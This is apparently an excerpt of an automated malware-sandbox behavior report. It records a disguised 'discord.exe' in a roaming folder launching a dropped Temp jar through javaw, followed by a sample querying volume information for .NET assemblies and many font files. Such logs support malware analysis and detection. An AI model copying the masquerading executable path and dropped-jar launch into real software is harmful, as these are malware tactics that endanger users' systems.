Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Users\user\Desktop\S3zoj9Uts0.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
